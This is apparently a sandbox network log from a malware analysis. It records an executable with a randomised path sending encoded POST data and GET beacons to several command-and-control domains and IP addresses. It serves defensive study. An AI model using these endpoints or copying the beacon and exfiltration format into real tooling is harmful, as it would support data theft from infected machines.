cd 94 ab f2 fc e5 f9 cf ff ef ef b5 af bc b0 89 a2 89 27 25 cc dc b6 25 0f 00 c7 c0 d1 86 13 dc 07 c1 7b 92 03 c9 52 00 76 20 43 60 59 5e 6b 6c ab f6 de 87 ee bb 0f 04 b6 ab 65 bb c0 54 d5 ae fa 54 dc fe 80 ae f2 6f 82 fa 3d 84 d9 04 21 ba aa 89 ea ff 01 0a 87 93 ec ca aa d5 4b fe 43 18 fe 70 d6 44 95 4e 9e f5 fe 61 f5 6f 76 f7 5f e7 10 44 e4 10 4c ab 35 19 aa fd 1e 06 63 0c 5a 48 3a 92 f6 31 2c eb da dd bf f7 77 26 22 a2 a2 22 02 69 5f c3 b7 fe f5 b6 f7 6e a6 bd ef 6e 63 00 15 95 18 44 4c 97 b1 d5 dd 67 28 51 1b 21 c8 80 19 d2 09 50 d7 57 30 1b 7b b3 7d d5 9b ef 12 b4 f4 d7 2f c9 23 25 37 f7 18 2f 93 ff 58 c0 b8 4b 8e fd ee e2 96 59 d5 e3 [TRUNCATED] Data Ascii: 58be"{?")/&>yjT-?IM=*\|U{o[l'SDBmd'%%{Rv C`Y^kleTTo=!KCpDNaov_DL5cZH:1,w&""i_nncDLg(Q!PW0{}/#%7/XKY.aREgWzZn;x4d+Z~#8<;k`\|:Y?N_>['(too!oV(}\|7YuE(xub}u.Ki\CvVI 7=Lak<N6oYV>b)6.1NcwI~~SCT?EGLHn>B6\wOBfr}x}dTBjtcPBRrW(~'d&hv%y)D;e\|_vZ~X`TDD~vIR}kLFW0J4J'
Sep 26, 2024 14:26:06.335014105 CEST	1236	IN	Data Raw: f2 64 7e 26 89 b6 da 67 22 a9 34 c5 9a 99 e0 a9 14 4c 82 86 ab 70 a9 ec 86 89 6f 4e 3e 9f 82 24 d7 f7 f8 9f 7b d5 e1 4f 87 6f 58 c7 04 ef 78 f4 88 43 8f ae 8c eb dc 69 1b 87 5f 21 75 e0 3c 50 b9 fd b7 75 35 0e c6 a9 26 ac 24 97 f9 8a 6f 56 5f 6a Data Ascii: d~&g"4LpoN>${OoXxCi_!u<Pu5&$oV_jhE)R!`?^IPJLI%$h$TI!^r.5UsJLyHp@\|w]kK:AV%hSRm8AgyyElVI
Sep 26, 2024 14:26:06.335067034 CEST	448	IN	Data Raw: e1 32 79 db b2 81 b6 0f 68 99 be 4d 96 c9 db af 96 f8 f2 90 92 11 6e 2d 19 12 7d 57 9e d9 37 a7 ed 32 21 49 fa 36 49 d3 6d 42 3c 4b bd b5 ef 8d 3b 2c bf e2 33 99 e2 75 c0 2a 89 78 89 ab 23 8b 2c 26 73 4a 14 ef 21 39 fa 2d eb f3 cd 2f 7d 4a 26 ab Data Ascii: 2yhMn-}W72!I6ImB<K;,3ux#,&sJ!9-/}J&zwQafC2R1g!Lziwh?E2%qiKkdH,{B\|_F9,y4H]]<q[&2k5#}_P5kA,$79)
Sep 26, 2024 14:26:06.335099936 CEST	1236	IN	Data Raw: 9b da d9 a8 b4 45 4f 0f 8c 73 8c 5e 4c 47 8f 59 f4 d8 32 ec 61 53 7c 94 c3 63 6f e5 a3 d0 37 59 0e df 97 bc e6 12 3e ce 99 e5 c0 f2 d3 af 2d d8 e6 83 69 90 1e 8c ab 5f e8 31 1f a7 aa c5 a7 bf 5c d1 e0 22 e3 28 58 6f 80 fd 19 3e bf fb fc ee f3 3b Data Ascii: EOs^LGY2aS\|co7Y>-i_1\"(Xo>;x?+!9.p;Y::C/K,A1*vV6'O/Q.aA~0YUGwBOTuX"v>J5Q#nE"^BsLSwzO_nssk0h
Sep 26, 2024 14:26:06.335133076 CEST	1236	IN	Data Raw: c0 9e 93 25 89 c8 49 04 2c d2 1f af ef 6a 4d a7 cc c6 8b 1e 0d 18 0d f4 86 b7 f5 81 ee 84 f0 45 ed f7 de 9d 21 ea e9 a9 d1 18 2c 20 d7 16 dd e5 d7 74 00 16 a4 2e f9 f5 e9 84 47 60 55 a2 19 95 09 50 89 bf 37 b3 73 4d 5b e7 cf ca 37 c4 fd 5e be e8 Data Ascii: %I,jME!, t.G`UP7sM[7^x<`>:j!Y`vuIHVnutc+'Cb[)jZ+kgQ/*Qz]uIF4'XZ+7oIF}:j\l#P]2B<j
Sep 26, 2024 14:26:06.335165024 CEST	448	IN	Data Raw: ac 7a e0 ce ea b1 ee 7f 44 71 b6 cd 9b 66 3a b8 5a 4d 3a a0 5b 09 56 f1 65 df ef 8d b6 2f ab 3b da 62 d9 c4 81 e8 86 ce 57 5b 1c 66 85 78 da 8e 42 62 78 92 80 00 8a 8c ae 3a 37 fa 64 b1 3d 35 18 e4 f1 0b 2e 77 98 3a aa 30 36 83 f3 7b 67 4d 49 b6 Data Ascii: zDqf:ZM:[Ve/;bW[fxBbx:7d=5.w:06{gMI,y5Q(O$M<?F5\zB8z>$k=)vzz8T"xw0dor=wyfM+Z^W}scz/~
Sep 26, 2024 14:26:06.335197926 CEST	1236	IN	Data Raw: 3c b7 fe 28 d2 3f 37 9a 5a 7c cf e3 9a 8f b2 d2 58 b2 63 8b 41 75 e8 24 be 83 d6 e0 65 db 1a bc d0 7d 56 f9 19 0c 1f b3 db 5e 5b 7c d7 02 e7 a7 a3 c7 e8 40 ce f3 db 39 4c 05 1c c5 22 20 49 6e 2b be f7 66 3b 57 19 c3 8c ae ce 46 de 6b cd 0c bd 77 Data Ascii: <(?7Z\|XcAu$e}V^[\|@9L" In+f;WFkw<_w\mRkej`(qeZ5E<zF8ywDu6A$6l.G4D< aq\|p!pbPQWwry(buObj;D;bP>J.zyY5MR
Sep 26, 2024 14:26:06.335231066 CEST	1236	IN	Data Raw: 5f 3b d3 3d 04 2a 61 5f 07 b7 bc 2a ae 7f d7 84 42 4e 38 4d 11 6a 99 46 d5 3b ec c2 43 53 2e 7b 70 ce 91 f2 9e 6c 05 7d 5b 84 41 82 12 fb 46 ba 5e af c3 61 ca 37 4b 14 c3 05 28 64 c3 25 5d 65 c2 59 cb b3 64 9b 4b 48 36 3c 50 0d 02 a6 05 95 f5 ef Data Ascii: _;=a_BN8MjF;CS.{pl}[AF^a7K(d%]eYdKH6<PPONZTw!IPV;pmd4DUenP-W`*3W<I#0!R7VrTTTM'1l Tjl`f=eYtQ5%98QSrS4b
Sep 26, 2024 14:26:06.335262060 CEST	448	IN	Data Raw: 8d 5a 1c ae bf 61 96 d6 9b 1a ac 18 08 2a 2f 1e 0b a3 49 c4 a0 63 cd 16 87 4e b3 69 b3 ce a6 cb 4b 0b d0 88 06 bb 51 00 c3 34 eb 80 c7 72 c0 a3 19 4f 9c 48 73 02 56 49 87 2b f0 dd 21 8a a0 e7 e5 84 33 5e 98 d3 83 a5 2e 36 08 ef 52 b0 7f fa 34 ae Data Ascii: Za/IcNiKQ4rOHsVI+!3^.6R4["_\|u\g8CH^knghF'@ /\!Hx>1B~h t=Hu&^%U75+m.*9V9Q[pJaUbry$dPNp#
Sep 26, 2024 14:26:06.335294962 CEST	1236	IN	Data Raw: 7c 43 53 5c a1 27 ac 53 72 5c 5d 20 08 ca 43 fa 14 4a 46 95 30 34 6a c4 fd 4f 75 f6 7b ab e5 8f b1 51 71 20 f6 bf 52 62 54 6d 28 c3 fe 57 01 1d 20 08 13 6e c6 89 9a ae d1 5c 41 8f ca 6c 68 6d e9 a4 c3 bf 8c 1d 1a a6 b4 5f 93 f7 04 88 9c b2 56 3d Data Ascii: \|CS\'Sr\] CJF04jOu{Qq RbTm(W n\Alhm_V=Ni=p57Y)oC=DRS]-Y8c+5Q~;J0<W%qV}TPnpuJp\4O(:)1G%*3@`_.}=6ri
Sep 26, 2024 14:26:06.340482950 CEST	1236	IN	Data Raw: 26 d5 e3 0d c7 dd 86 d7 ea 09 47 13 1a 9a 79 e8 28 87 6c 4a dc 1d 3a 40 4e a6 be 13 fb aa fd ec d0 73 08 2f 8e f5 19 91 fd 60 f3 57 4d f8 28 aa ce f4 cf 83 ee bb 1d fb 4d d6 59 63 26 7a bd 13 0a a1 67 98 67 59 6d 2c 38 a5 9c 37 1a 1b b5 9c d6 4b Data Ascii: &Gy(lJ:@Ns/`WM(MYc&zggYm,87K>-o&6Z.1<_/sG{f+*qsjV-}B8IRTS.PJ`rz`;Key^/F`"0g.V__U@#kZWe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49775	221.121.144.149	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:07.380870104 CEST	467	OUT	GET /ljdj/?sL9tFJ=ZICPfDYGGExxFAxCww1xwUjvDbJY85yXQI6dp2kJB8RnqeyNXlFMy7FVDhewpD/mY7kOCunrzTJsDmzjVkamuOhh+qvjCKHphba70ug78hyc7mtXPvEWT9U=&gB7t=xFqX1hC8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.inf30027group23.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Sep 26, 2024 14:26:08.794763088 CEST	619	IN	HTTP/1.1 301 Moved Permanently Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://inf30027group23.xyz/ljdj/?sL9tFJ=ZICPfDYGGExxFAxCww1xwUjvDbJY85yXQI6dp2kJB8RnqeyNXlFMy7FVDhewpD/mY7kOCunrzTJsDmzjVkamuOhh+qvjCKHphba70ug78hyc7mtXPvEWT9U=&gB7t=xFqX1hC8 x-litespeed-cache-control: public,max-age=3600 x-litespeed-tag: 3da_HTTP.404,3da_HTTP.301,3da_404,3da_URL.b1b1b97a494d41017559475b29323061,3da_ content-length: 0 date: Thu, 26 Sep 2024 12:26:09 GMT server: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49776	85.159.66.93	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:13.952896118 CEST	750	OUT	POST /51hg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.mudanya-nakliyat.xyz Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close Cache-Control: no-cache Origin: http://www.mudanya-nakliyat.xyz Referer: http://www.mudanya-nakliyat.xyz/51hg/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 6f 78 7a 63 54 4b 35 39 36 52 67 6b 6b 33 49 70 36 48 56 46 4e 65 2f 55 6a 45 67 31 4e 56 72 35 41 46 33 48 6c 32 6c 2f 2f 31 38 6a 6e 39 64 35 70 68 2f 6b 53 57 44 35 59 51 52 5a 6b 61 37 4d 71 69 6e 50 34 79 6a 69 79 69 4a 4c 4b 57 6b 45 32 77 47 65 65 4f 32 70 39 50 63 32 6f 55 4f 75 34 6c 38 78 71 30 4a 68 78 77 54 4d 61 39 6e 56 46 39 65 6c 4e 37 31 4e 6b 59 32 73 79 30 2f 72 66 57 6d 44 4b 67 72 35 4b 31 4d 42 54 5a 37 57 49 64 61 6d 71 51 78 66 4f 74 43 30 51 50 39 2f 63 6b 2f 59 76 67 61 47 51 46 6a 41 72 70 54 52 34 56 4f 5a 70 56 61 6a 2f 49 47 43 6d 63 34 32 58 51 3d 3d Data Ascii: sL9tFJ=oxzcTK596Rgkk3Ip6HVFNe/UjEg1NVr5AF3Hl2l//18jn9d5ph/kSWD5YQRZka7MqinP4yjiyiJLKWkE2wGeeO2p9Pc2oUOu4l8xq0JhxwTMa9nVF9elN71NkY2sy0/rfWmDKgr5K1MBTZ7WIdamqQxfOtC0QP9/ck/YvgaGQFjArpTR4VOZpVaj/IGCmc42XQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49777	85.159.66.93	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:16.497605085 CEST	770	OUT	POST /51hg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.mudanya-nakliyat.xyz Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close Cache-Control: no-cache Origin: http://www.mudanya-nakliyat.xyz Referer: http://www.mudanya-nakliyat.xyz/51hg/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 6f 78 7a 63 54 4b 35 39 36 52 67 6b 72 30 41 70 39 67 35 46 63 75 2f 58 73 6b 67 31 47 31 72 39 41 45 4c 48 6c 7a 56 76 2f 47 49 6a 6e 63 74 35 6f 67 2f 6b 56 57 44 35 57 77 51 54 71 36 37 78 71 6c 75 36 34 33 44 69 79 69 64 4c 4b 57 55 45 31 48 53 42 66 65 32 72 78 76 64 77 6c 30 4f 75 34 6c 38 78 71 77 5a 50 78 77 4c 4d 5a 4d 58 56 43 73 65 36 45 62 31 4f 30 34 32 73 32 30 2f 76 66 57 6e 7a 4b 67 62 66 4b 33 30 42 54 62 7a 57 49 49 75 68 68 51 78 64 43 39 44 45 52 36 4d 59 65 33 36 6f 74 43 43 65 61 48 2f 79 6a 50 43 4c 70 6b 76 4f 37 56 2b 51 69 50 50 32 72 66 46 2f 4d 65 66 34 66 57 63 67 44 42 76 30 49 59 58 71 31 43 2b 52 75 6b 34 3d Data Ascii: sL9tFJ=oxzcTK596Rgkr0Ap9g5Fcu/Xskg1G1r9AELHlzVv/GIjnct5og/kVWD5WwQTq67xqlu643DiyidLKWUE1HSBfe2rxvdwl0Ou4l8xqwZPxwLMZMXVCse6Eb1O042s20/vfWnzKgbfK30BTbzWIIuhhQxdC9DER6MYe36otCCeaH/yjPCLpkvO7V+QiPP2rfF/Mef4fWcgDBv0IYXq1C+Ruk4=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49778	85.159.66.93	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:19.043593884 CEST	10852	OUT	POST /51hg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.mudanya-nakliyat.xyz Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close Cache-Control: no-cache Origin: http://www.mudanya-nakliyat.xyz Referer: http://www.mudanya-nakliyat.xyz/51hg/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 6f 78 7a 63 54 4b 35 39 36 52 67 6b 72 30 41 70 39 67 35 46 63 75 2f 58 73 6b 67 31 47 31 72 39 41 45 4c 48 6c 7a 56 76 2f 48 77 6a 6e 75 4a 35 6f 44 58 6b 55 57 44 35 49 67 51 51 71 36 37 67 71 6a 47 2b 34 33 48 59 79 67 6c 4c 59 6e 30 45 39 57 53 42 52 65 32 72 73 2f 64 67 6f 55 4f 42 34 6c 73 31 71 30 39 50 78 77 4c 4d 5a 50 50 56 55 74 65 36 43 62 31 4e 6b 59 32 6f 79 30 2f 58 66 57 2f 46 4b 68 76 70 4a 48 55 42 53 37 6a 57 4a 36 32 68 69 77 78 44 42 39 44 63 52 36 49 48 65 30 66 52 74 44 32 6b 61 46 6a 79 67 36 6a 2f 7a 55 6e 46 73 56 32 75 79 4e 50 46 6b 63 68 6f 4c 74 47 44 62 57 41 34 62 51 71 5a 46 35 47 44 6c 69 79 77 39 54 6d 54 53 72 61 59 30 70 45 4b 69 43 79 2f 74 55 36 6f 6f 42 74 59 2f 7a 36 4f 35 5a 55 75 53 71 67 58 4a 31 36 73 59 71 6e 51 59 48 34 55 4c 71 64 72 63 2f 4f 39 6d 56 41 32 56 2f 48 4a 4b 6e 76 63 61 6a 46 2b 62 4c 63 51 4c 31 68 44 48 6b 76 4a 68 6c 2f 43 6e 75 6a 6b 49 41 48 66 71 42 2b 2b 43 78 38 5a 34 37 71 46 6f 39 4f 4a 70 43 49 30 70 63 4a [TRUNCATED] Data Ascii: sL9tFJ=oxzcTK596Rgkr0Ap9g5Fcu/Xskg1G1r9AELHlzVv/HwjnuJ5oDXkUWD5IgQQq67gqjG+43HYyglLYn0E9WSBRe2rs/dgoUOB4ls1q09PxwLMZPPVUte6Cb1NkY2oy0/XfW/FKhvpJHUBS7jWJ62hiwxDB9DcR6IHe0fRtD2kaFjyg6j/zUnFsV2uyNPFkchoLtGDbWA4bQqZF5GDliyw9TmTSraY0pEKiCy/tU6ooBtY/z6O5ZUuSqgXJ16sYqnQYH4ULqdrc/O9mVA2V/HJKnvcajF+bLcQL1hDHkvJhl/CnujkIAHfqB++Cx8Z47qFo9OJpCI0pcJ8yQwTPQ2alw+1nd0uCoqZs122ZlFMMgoc4sa9AB6Dw79k1wxuJ5PiJPZtGIHNwnWopfwrAtNj3kywHkOGqEnwwDrfKPLvCppoVv1/T7lIBK83rlApfrgHMI4GUCf+EhKN3dcWe41C+Tj31h0oydL9N7cMytfcwkNUu50AbjasECBGYUEuC0mpYLb3IBpLX/3fC9GT0tJxoP6XtYytcs7o3TGxbxLqH/xpD9D/GPbzSZzdQCH5tj4iH12R2sSF7H5tDyTpX2UXImQPoLDYww0MNYYpUAn0z1Q+KnFG9BsUIiqv12yj1WqAY57m8DknN0Fm8xgSFJzgGQcztsdgm5uXluiIqvL1mUu/9BGMDV0q5NNbrOVMfkQeSZlYqzrEFaPBvITeqlAXt8DSPe0l96uIAry/2ai2cUL1NMdnsB0P38dBYXtUdAq58DXnJTkBDwRwb7L8EqNLmYstV1pHD0CQHDzFuXcuP/lP0sd5vYnNHi2TYodE0axohMxrKwlVcvYShjkaCVVvUGchMKLTVqbwC+lGOI1iegfvRaORe3q+imy+Kro/1rDzb1NMK8il0g2Iw5Ma+a91NdaSDoSJ5fZWN4gLT2geuDbhnG4CSDdm+iC/w72A2YhJaEXn8kszmaHaeE2Lbxa71UUD+nLk8uqEOEwvY5A/M+04d [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49779	85.159.66.93	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:21.585375071 CEST	468	OUT	GET /51hg/?sL9tFJ=lzb8Q+1ZkRYL+ndO3j5PVMDGwV51DFPdeivGsnVW/hUSyu5WpgLMVT/2ZD9ppe7fxW6d+w7xhCgyU1oioUeFR6Wo19Fxr1GQyE0P1h5QkDnbWNzfENeGUo8=&gB7t=xFqX1hC8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.mudanya-nakliyat.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Sep 26, 2024 14:26:22.261334896 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Thu, 26 Sep 2024 12:26:22 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-09-26T12:26:27.1552475Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49780	50.3.111.89	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:27.312942028 CEST	738	OUT	POST /m4jf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.solargridxx.shop Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close Cache-Control: no-cache Origin: http://www.solargridxx.shop Referer: http://www.solargridxx.shop/m4jf/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 35 52 49 77 42 41 4c 73 75 2f 38 57 48 33 57 61 41 36 71 54 72 41 37 68 71 69 62 43 79 48 6d 4e 76 6a 38 2f 73 64 39 34 46 43 58 44 69 45 78 42 34 76 48 6c 71 58 6c 54 49 7a 73 4f 50 54 78 77 67 73 43 78 70 6b 49 30 4f 69 55 79 47 75 57 30 44 35 68 76 4f 35 58 47 43 73 41 62 2f 2f 58 36 6b 37 37 52 6d 78 53 6a 46 52 62 7a 58 66 54 73 4e 51 44 7a 4c 70 4e 30 39 30 50 75 30 6d 54 55 33 4c 4d 51 71 45 30 46 52 59 70 46 49 74 4f 68 62 35 57 76 7a 6f 38 34 42 78 69 7a 67 33 6c 6e 33 6e 2b 6c 31 59 59 46 44 67 6a 30 57 6e 4a 6c 74 68 58 4e 6a 67 4d 47 58 56 57 39 49 72 44 42 45 77 3d 3d Data Ascii: sL9tFJ=5RIwBALsu/8WH3WaA6qTrA7hqibCyHmNvj8/sd94FCXDiExB4vHlqXlTIzsOPTxwgsCxpkI0OiUyGuW0D5hvO5XGCsAb//X6k77RmxSjFRbzXfTsNQDzLpN090Pu0mTU3LMQqE0FRYpFItOhb5Wvzo84Bxizg3ln3n+l1YYFDgj0WnJlthXNjgMGXVW9IrDBEw==
Sep 26, 2024 14:26:27.903109074 CEST	216	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 12:26:27 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 13 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 49 6e 76 61 6c 69 64 20 6c 69 6e 6b 2e Data Ascii: Invalid link.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49781	50.3.111.89	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:29.853851080 CEST	758	OUT	POST /m4jf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.solargridxx.shop Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close Cache-Control: no-cache Origin: http://www.solargridxx.shop Referer: http://www.solargridxx.shop/m4jf/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 35 52 49 77 42 41 4c 73 75 2f 38 57 47 57 6d 61 47 62 71 54 70 67 37 75 7a 69 62 43 39 6e 6e 6c 76 6a 77 2f 73 59 63 6c 46 51 7a 44 69 6c 42 42 71 75 48 6c 74 58 6c 54 63 6a 73 4c 53 44 78 33 67 73 2b 54 70 67 49 30 4f 6d 38 79 47 73 65 30 43 4b 35 73 50 70 58 49 57 63 41 5a 31 66 58 36 6b 37 37 52 6d 78 57 4a 46 52 54 7a 58 50 44 73 4d 7a 62 77 56 5a 4e 7a 36 30 50 75 77 6d 54 51 33 4c 4d 79 71 42 64 4e 52 62 52 46 49 74 2b 68 59 6f 57 67 35 6f 38 36 46 78 6a 51 6f 58 55 64 31 31 36 6f 78 61 63 43 43 42 76 4d 58 68 59 2f 38 51 32 61 78 67 6f 31 4b 53 66 4a 46 6f 2b 49 66 79 65 36 49 38 31 6a 79 57 6f 30 56 70 75 63 6e 2b 73 48 49 4d 6b 3d Data Ascii: sL9tFJ=5RIwBALsu/8WGWmaGbqTpg7uzibC9nnlvjw/sYclFQzDilBBquHltXlTcjsLSDx3gs+TpgI0Om8yGse0CK5sPpXIWcAZ1fX6k77RmxWJFRTzXPDsMzbwVZNz60PuwmTQ3LMyqBdNRbRFIt+hYoWg5o86FxjQoXUd116oxacCCBvMXhY/8Q2axgo1KSfJFo+Ifye6I81jyWo0Vpucn+sHIMk=
Sep 26, 2024 14:26:30.439476013 CEST	216	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 12:26:30 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 13 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 49 6e 76 61 6c 69 64 20 6c 69 6e 6b 2e Data Ascii: Invalid link.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49782	50.3.111.89	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:32.420094013 CEST	10840	OUT	POST /m4jf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.solargridxx.shop Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close Cache-Control: no-cache Origin: http://www.solargridxx.shop Referer: http://www.solargridxx.shop/m4jf/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 35 52 49 77 42 41 4c 73 75 2f 38 57 47 57 6d 61 47 62 71 54 70 67 37 75 7a 69 62 43 39 6e 6e 6c 76 6a 77 2f 73 59 63 6c 46 51 37 44 68 58 6c 42 34 4e 76 6c 73 58 6c 54 41 54 73 4b 53 44 78 6d 67 73 6d 58 70 67 4d 6b 4f 67 34 79 48 4a 53 30 46 37 35 73 57 35 58 49 4a 4d 41 61 2f 2f 58 76 6b 37 72 64 6d 77 6d 4a 46 52 54 7a 58 4e 4c 73 4c 67 44 77 58 5a 4e 30 39 30 50 36 30 6d 54 73 33 49 38 49 71 42 51 76 52 71 78 46 49 4a 61 68 55 2b 43 67 6a 6f 38 6b 43 78 6a 32 6f 58 59 34 31 31 6e 5a 78 62 34 6b 43 42 72 4d 57 45 70 33 75 67 79 69 6a 6d 73 6d 61 41 2f 63 4d 35 4f 73 63 7a 69 56 4c 2b 31 71 76 46 34 42 49 35 69 52 37 2f 42 44 62 73 6b 62 46 75 55 2b 42 36 48 62 6c 77 75 68 51 70 6c 65 30 31 31 35 48 2f 35 4e 51 66 2f 43 43 69 5a 65 70 79 75 47 65 37 34 6c 73 43 4c 36 4c 53 59 39 6d 4b 6f 69 32 4d 2f 33 4b 38 47 39 4c 6b 4f 4e 57 59 78 34 6d 42 43 49 52 37 2f 32 47 32 41 52 47 64 30 6a 2b 71 79 79 2b 71 6e 44 36 77 51 38 57 49 47 61 6a 4f 43 71 4a 69 74 36 52 51 69 39 77 6b 44 [TRUNCATED] Data Ascii: 